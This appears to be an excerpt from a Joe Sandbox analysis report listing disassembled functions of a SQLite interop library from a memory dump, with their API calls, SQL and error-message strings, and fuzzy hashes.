Instruction Fuzzy Hash: 41E1D272A553019BD700CF68D881E5BB7E5EF89318F044569EC98DB301F738EA25CBA6

Function 6BCCB710 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 291COMMON

Download Yara Rule

APIs

SIdb45e174afb28e2c.SQLITE.INTEROP(PRAGMA '%q'.table_info('%q'),?,?,00000000,00000000,?,?,?,?,00000000,?,?), ref: 6BCCB734
SIdb45e174afb28e2c.SQLITE.INTEROP(SELECT 0, 'tbl', '', 0, '', 1 UNION ALL SELECT 1, 'idx', '', 0, '', 2 UNION ALL SELECT 2, 'stat', '', 0, '', 0,?,?,?,?,?,?,00000000,00000000,?,?,?,?,00000000,?,?), ref: 6BCCB7BC
SIdb45e174afb28e2c.SQLITE.INTEROP(6BD06F50,?,?,?,?,?,?,00000000,00000000,?,?,?,?,00000000,?,?), ref: 6BCCB7EC
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,00000000,?), ref: 6BCCB84B
SIa364946505687432.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,00000000), ref: 6BCCB895
SI25ca8d2baaee0750.SQLITE.INTEROP(?,00000001,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 6BCCB8A5
SIa364946505687432.SQLITE.INTEROP(?,?,00000001,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 6BCCB8B3
SIa364946505687432.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 6BCCB970
SI25ca8d2baaee0750.SQLITE.INTEROP(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BCCB989
SI1bfe410acac3c9be.SQLITE.INTEROP(?,00000005), ref: 6BCCB9B9
SIa364946505687432.SQLITE.INTEROP(?,?,00000005), ref: 6BCCB9CC

Strings

PRAGMA '%q'.table_info('%q'), xrefs: 6BCCB72F
SELECT 0, 'tbl', '', 0, '', 1 UNION ALL SELECT 1, 'idx', '', 0, '', 2 UNION ALL SELECT 2, 'stat', '', 0, '', 0, xrefs: 6BCCB7B7
sqlite_stat1, xrefs: 6BCCB786

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Ia364946505687432.$Idb45e174afb28e2c.$I25ca8d2baaee0750.$I1bfe410acac3c9be.Iaa0f8e0c251cfd1d.
String ID: PRAGMA '%q'.table_info('%q')$SELECT 0, 'tbl', '', 0, '', 1 UNION ALL SELECT 1, 'idx', '', 0, '', 2 UNION ALL SELECT 2, 'stat', '', 0, '', 0$sqlite_stat1
API String ID: 1143027874-3059532742
Opcode ID: 5f8cb0417928365ddfe4189f760046dd55bfa476dd05fcf9ba3872952c6b763b
Instruction ID: 76f68aba2ee3fed1cfb4f8fd034c49942277fbcb40c5cacc09d72fdc880c4dc2
Opcode Fuzzy Hash: 5f8cb0417928365ddfe4189f760046dd55bfa476dd05fcf9ba3872952c6b763b
Instruction Fuzzy Hash: 57A1C1B5E102099BDB00CF64DC81AAF77B9EF95318F1441A5EC15AB341F739EA11CBA2

Function 6BCD2850 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 391COMMON

Download Yara Rule

APIs

SIc14fb8a21feb2e94.SQLITE.INTEROP(?,SAVEPOINT changeset,00000000,00000000,00000000), ref: 6BCD2898
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCD28CD
SIa364946505687432.SQLITE.INTEROP(?), ref: 6BCD2A68

Strings

%s at line %d of [%.10s], xrefs: 6BCD28C6, 6BCD2CA0
SAVEPOINT changeset, xrefs: 6BCD2892
RELEASE changeset, xrefs: 6BCD2C78
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCD28B7, 6BCD2C91
misuse, xrefs: 6BCD28C1, 6BCD2C9B

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.Ia364946505687432.Ic14fb8a21feb2e94.
String ID: %s at line %d of [%.10s]$RELEASE changeset$SAVEPOINT changeset$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2646806474-2422101649
Opcode ID: 763de904165c620f598db56ac98f75b5893fce9ccb5c9ee5121feeb3c52c7630
Instruction ID: bd5708f5040998a80d219ec3daf78b31a761274147e06d212ec2e29e98e61452
Opcode Fuzzy Hash: 763de904165c620f598db56ac98f75b5893fce9ccb5c9ee5121feeb3c52c7630
Instruction Fuzzy Hash: 2AD19DB5A18341ABC710CF28C89191BB7F5BFC8714F044A5DFA959B301E779EA05CBA2

Function 6BC4BE30 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 339COMMON

Download Yara Rule

Strings

%03d, xrefs: 6BC4C0C8
%lld, xrefs: 6BC4C15D
%02d, xrefs: 6BC4BF93, 6BC4BFE9, 6BC4C0AA, 6BC4C110, 6BC4C129, 6BC4C17E
%.16g, xrefs: 6BC4C0F4
%06.3f, xrefs: 6BC4BFCD
%04d, xrefs: 6BC4C1C5

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID:
String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld
API String ID: 0-866662573
Opcode ID: de9a701766c8bf98022ce6478e8fff5eba4a6e76eb1a47393e15515382301c3c
Instruction ID: db2d7196775dc23ed34dc1c97d5584e9b56d843b52176e3a0e4949fec9854b2f
Opcode Fuzzy Hash: de9a701766c8bf98022ce6478e8fff5eba4a6e76eb1a47393e15515382301c3c
Instruction Fuzzy Hash: BEB1F472A183409BD7148BB8CC41B5FB7B8FBC2744F40491DF68597251E779EB488B92

Function 6BC3E290 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 204COMMON

Download Yara Rule

APIs

SI5b4aedd0c04bd151.SQLITE.INTEROP(?), ref: 6BC3E2A3
SI905dcc543d48caab.SQLITE.INTEROP(?,1st argument to percentile() is not numeric,000000FF), ref: 6BC3E377
SI905dcc543d48caab.SQLITE.INTEROP(?,2nd argument to percentile() is not the same for all input rows,000000FF), ref: 6BC3E3B6
SI94ecb64e9dbb8338.SQLITE.INTEROP ref: 6BC3E3C6
SI905dcc543d48caab.SQLITE.INTEROP(?,Inf input to percentile(),000000FF), ref: 6BC3E3E9
SIf0a08171cb5be57f.SQLITE.INTEROP(?,00000000,00000000), ref: 6BC3E416
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC3E426
SI1bf8975e567ea97a.SQLITE.INTEROP(?), ref: 6BC3E445

Strings

Inf input to percentile(), xrefs: 6BC3E3E3
2nd argument to percentile() is not the same for all input rows, xrefs: 6BC3E3B0
2nd argument to percentile() is not a number between 0.0 and 100.0, xrefs: 6BC3E486
1st argument to percentile() is not numeric, xrefs: 6BC3E371

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I905dcc543d48caab.$I1bf8975e567ea97a.I5b4aedd0c04bd151.I94ecb64e9dbb8338.Iaa0f8e0c251cfd1d.If0a08171cb5be57f.
String ID: 1st argument to percentile() is not numeric$2nd argument to percentile() is not a number between 0.0 and 100.0$2nd argument to percentile() is not the same for all input rows$Inf input to percentile()
API String ID: 908108584-2567114664
Opcode ID: be5f65a7d3081d467adead9e6d6777c32b6a1c30ee357da26d34bc4b49d6f1a6
Instruction ID: f5ad041253416a84fa3a02d767aaa38aa201b1e815ac6b738363ffe2cec735b4
Opcode Fuzzy Hash: be5f65a7d3081d467adead9e6d6777c32b6a1c30ee357da26d34bc4b49d6f1a6
Instruction Fuzzy Hash: 7D519EB1A2011797C7009F29E840755B7A4FF89365FA007A5F86C83290FB3ADA61C7E1

Function 6BBF8850 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 65COMMON

Download Yara Rule

APIs

OutputDebugStringA.KERNEL32(invalid ICLRRuntimeHost pointer.,00000000,?), ref: 6BBF8878
_memset.LIBCMT ref: 6BBF888D
__snprintf.LIBCMT ref: 6BBF88A9
OutputDebugStringA.KERNEL32(?), ref: 6BBF88B8
OutputDebugStringA.KERNEL32(invalid ICLRRuntimeHost.,00000000,?), ref: 6BBF88DD
OutputDebugStringA.KERNEL32(done with cleanup.), ref: 6BBF88F5

Strings

<unknown>, xrefs: 6BBF8893
invalid ICLRRuntimeHost., xrefs: 6BBF88D8
invalid ICLRRuntimeHost pointer., xrefs: 6BBF8873
done with cleanup., xrefs: 6BBF88EE
eeeSdk1: %s HRESULT 0x%016X, xrefs: 6BBF8898

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: DebugOutputString$__snprintf_memset
String ID: <unknown>$done with cleanup.$eeeSdk1: %s HRESULT 0x%016X$invalid ICLRRuntimeHost pointer.$invalid ICLRRuntimeHost.
API String ID: 543257962-3439405060
Opcode ID: a8781807804408e63d587baed2692a4c32ffbacee2a751fb94bd432590c03a97
Instruction ID: 30833f6e3fba17430b4cac42866e69c5b811c1cf771ffd3ce7660d77e4e63b61
Opcode Fuzzy Hash: a8781807804408e63d587baed2692a4c32ffbacee2a751fb94bd432590c03a97
Instruction Fuzzy Hash: 6F11C432E10218EBD710EFB5DC41AADB379EF89320F45419DEA489B240DB38DD068BD1

Function 6BC99710 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 382COMMON

Download Yara Rule

APIs

SIa364946505687432.SQLITE.INTEROP(?,?,?,?,?,6BC8DA3D,00000000,?,?,?,6BCA0307,6BC8DA3D,?), ref: 6BC99750

Part of subcall function 6BCC0600: SI769271af19a2299d.SQLITE.INTEROP(00000015,API called with finalized prepared statement,00000000,00000000,6BC8DA3D,?,6BC99755,?,?,?,?,?,6BC8DA3D,00000000,?), ref: 6BCC062D
Part of subcall function 6BCC0600: SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0001590B,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,6BC8DA3D,?,6BC99755,?,?,?,?,?,6BC8DA3D,00000000), ref: 6BCC064B

SI1bfe410acac3c9be.SQLITE.INTEROP(?,00000001,?,?,?,?,?,?,?,6BC8DA3D,00000000,?,?,?,6BCA0307,6BC8DA3D), ref: 6BC9977F
_memset.LIBCMT ref: 6BC9984C
SIa364946505687432.SQLITE.INTEROP(?,?,?,?,?,?,?,?,6BC8DA3D,00000000,?,?,?,6BCA0307,6BC8DA3D,?), ref: 6BC998A8
SIa364946505687432.SQLITE.INTEROP(?), ref: 6BC9992F
SI25ca8d2baaee0750.SQLITE.INTEROP(?,00000004), ref: 6BC99A3E
_memset.LIBCMT ref: 6BC99A85
SI8259474343588db4.SQLITE.INTEROP(?,00000004,?), ref: 6BC99AA8
SIa364946505687432.SQLITE.INTEROP(?), ref: 6BC99AC6

Strings

SELECT idx,neq,nlt,ndlt,sample FROM %Q.sqlite_stat4, xrefs: 6BC998D1

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Ia364946505687432.$I769271af19a2299d._memset$I1bfe410acac3c9be.I25ca8d2baaee0750.I8259474343588db4.
String ID: SELECT idx,neq,nlt,ndlt,sample FROM %Q.sqlite_stat4
API String ID: 2982167675-1240430669
Opcode ID: 5828d3002ee8b096c00a2149c82ac21443de6668fd2b153a2f3e3362932813ae
Instruction ID: f2e9b44ff7e2d26a3b8db28956db7b20ceb00bc16c1a58de7829106514459342
Opcode Fuzzy Hash: 5828d3002ee8b096c00a2149c82ac21443de6668fd2b153a2f3e3362932813ae
Instruction Fuzzy Hash: B4C1B7B1E213006BEB10DF75AC82F6B73B99F84714F144469ED159B242FA79EB01C7A1

Function 6BC5CAD0 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5CB0A
SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,unopened), ref: 6BC5CC4E
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5CC6C

Strings

%s at line %d of [%.10s], xrefs: 6BC5CB03, 6BC5CC65
API call with %s database connection pointer, xrefs: 6BC5CC47
NULL, xrefs: 6BC5CC22
invalid, xrefs: 6BC5CC3B
unopened, xrefs: 6BC5CC42
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5CAF4, 6BC5CC56
misuse, xrefs: 6BC5CAFE, 6BC5CC60

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$invalid$misuse$unopened
API String ID: 2981141233-857223478
Opcode ID: 20643edc26a75a5d6015af276f0ea260a48c990cc91754540ed31d08572bf983
Instruction ID: 855c28a80c80329d9638e4ef30331e9e808ed8c3137eeba72132b4d128aa7aa9
Opcode Fuzzy Hash: 20643edc26a75a5d6015af276f0ea260a48c990cc91754540ed31d08572bf983
Instruction Fuzzy Hash: 37512772A257018BD710CF39D841B0777E4EF45724F0046A9E899DB241F73DEA7887AA

Function 6BC59080 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 118COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,API called with finalized prepared statement,?,?,?,6BC5F131), ref: 6BC5909D
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015B91,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC590BB
SI769271af19a2299d.SQLITE.INTEROP(00000015,bind on a busy prepared statement: [%s],?), ref: 6BC5911A
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015B99,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC59138

Strings

%s at line %d of [%.10s], xrefs: 6BC590B4, 6BC59131
bind on a busy prepared statement: [%s], xrefs: 6BC59113
API called with NULL prepared statement, xrefs: 6BC59089
API called with finalized prepared statement, xrefs: 6BC59096
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC590A5, 6BC59122
misuse, xrefs: 6BC590AF, 6BC5912C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-111843438
Opcode ID: ec01a23d9ddf7f965a5ff73752596e300e2a91167fc177a5a603ea6d239dcfe2
Instruction ID: 999d3755a2bcb299a28d11076561fbf92d89f47feaefce9cbabbf73714a342f2
Opcode Fuzzy Hash: ec01a23d9ddf7f965a5ff73752596e300e2a91167fc177a5a603ea6d239dcfe2
Instruction Fuzzy Hash: F03106B17206019BFB108F38DC89F4777A0AB80319F1005A9E55A9F282FB7DD66497A1

Function 6BC5C850 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5C87E
SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,unopened), ref: 6BC5C8E6
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5C904

Strings

%s at line %d of [%.10s], xrefs: 6BC5C877, 6BC5C8FD
API call with %s database connection pointer, xrefs: 6BC5C8DF
NULL, xrefs: 6BC5C8BA
invalid, xrefs: 6BC5C8D3
unopened, xrefs: 6BC5C8DA
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5C868, 6BC5C8EE
misuse, xrefs: 6BC5C872, 6BC5C8F8

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$invalid$misuse$unopened
API String ID: 2981141233-857223478
Opcode ID: 59bb416e5446d7918cbe108d245f1563c4f16525aed39b9e7298b0e79d011841
Instruction ID: c268d5cb5ddb368153263edcce873897254dc8a53548144c22e81dbadf13b2bb
Opcode Fuzzy Hash: 59bb416e5446d7918cbe108d245f1563c4f16525aed39b9e7298b0e79d011841
Instruction Fuzzy Hash: D7210837B652117BDB005B799C42F873795AF81B39B0500B5EA19EF282FE2CD63442B6

Function 6BCC1A50 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 359COMMON

Download Yara Rule

APIs

SI8c5d6a3d79dd16ae.SQLITE.INTEROP(?,?,00000001,?,?,?), ref: 6BCC1ACD
SIa364946505687432.SQLITE.INTEROP(?,?,?,?,00000000,00000000,?,?,?,?,00000000,00000000,6BCDE566), ref: 6BCC1AE1
SI06ad3f4f233fab5b.SQLITE.INTEROP(00000000,?,?,?,?,?,00000000,00000000,?,?,?,?,00000000,00000000,6BCDE566), ref: 6BCC1AFE
SIa364946505687432.SQLITE.INTEROP(?,?,?,?,00000000,00000000,?,?,?,?,00000000,00000000,6BCDE566), ref: 6BCC1CAA
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A76F,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,?,?,00000000,00000000,?,?,?,?), ref: 6BCC1CE7

Strings

%s at line %d of [%.10s], xrefs: 6BCC1CE0
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCC1CD1
misuse, xrefs: 6BCC1CDB

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Ia364946505687432.$I06ad3f4f233fab5b.I769271af19a2299d.I8c5d6a3d79dd16ae.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 973435178-160653349
Opcode ID: b48a0f963a6dee8e9d56e60f82508632592a53bffd3d40a9017711e7d003979e
Instruction ID: e34b4c5be8046d20cc874269508331d779687624d755f013657763901326c74d
Opcode Fuzzy Hash: b48a0f963a6dee8e9d56e60f82508632592a53bffd3d40a9017711e7d003979e
Instruction Fuzzy Hash: 60C1F7B5B252159BE700CF2AD880B6773A9EF94714F0444A9FD088B341F739EE41CBA2

Function 6BCE1F70 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 239COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCE1FD9
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BCE21E5

Part of subcall function 6BCCB710: SIdb45e174afb28e2c.SQLITE.INTEROP(PRAGMA '%q'.table_info('%q'),?,?,00000000,00000000,?,?,?,?,00000000,?,?), ref: 6BCCB734

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BCE2121
SIdb45e174afb28e2c.SQLITE.INTEROP(table schemas do not match), ref: 6BCE213C
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCE222F

Strings

%s at line %d of [%.10s], xrefs: 6BCE1FD2, 6BCE2228
table schemas do not match, xrefs: 6BCE2137
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCE1FC3, 6BCE2219
misuse, xrefs: 6BCE1FCD, 6BCE2223

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
